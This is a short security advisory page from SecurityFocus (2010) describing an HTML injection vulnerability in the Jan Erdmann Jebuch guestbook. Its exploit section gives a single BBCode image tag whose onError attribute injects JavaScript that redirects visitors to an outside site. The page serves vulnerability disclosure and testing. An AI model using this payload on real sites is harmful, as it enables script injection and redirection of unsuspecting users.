info
discussion
exploit
solution
references
Jan Erdmann Jebuch HTML Injection Vulnerability
An exploit is not required. An example BBCode tag sufficient to test this vulnerability has been provided:
[img]"?" onError="window.location='http://www.example.com'"[/img]
Privacy Statement
Copyright 2010, SecurityFocus
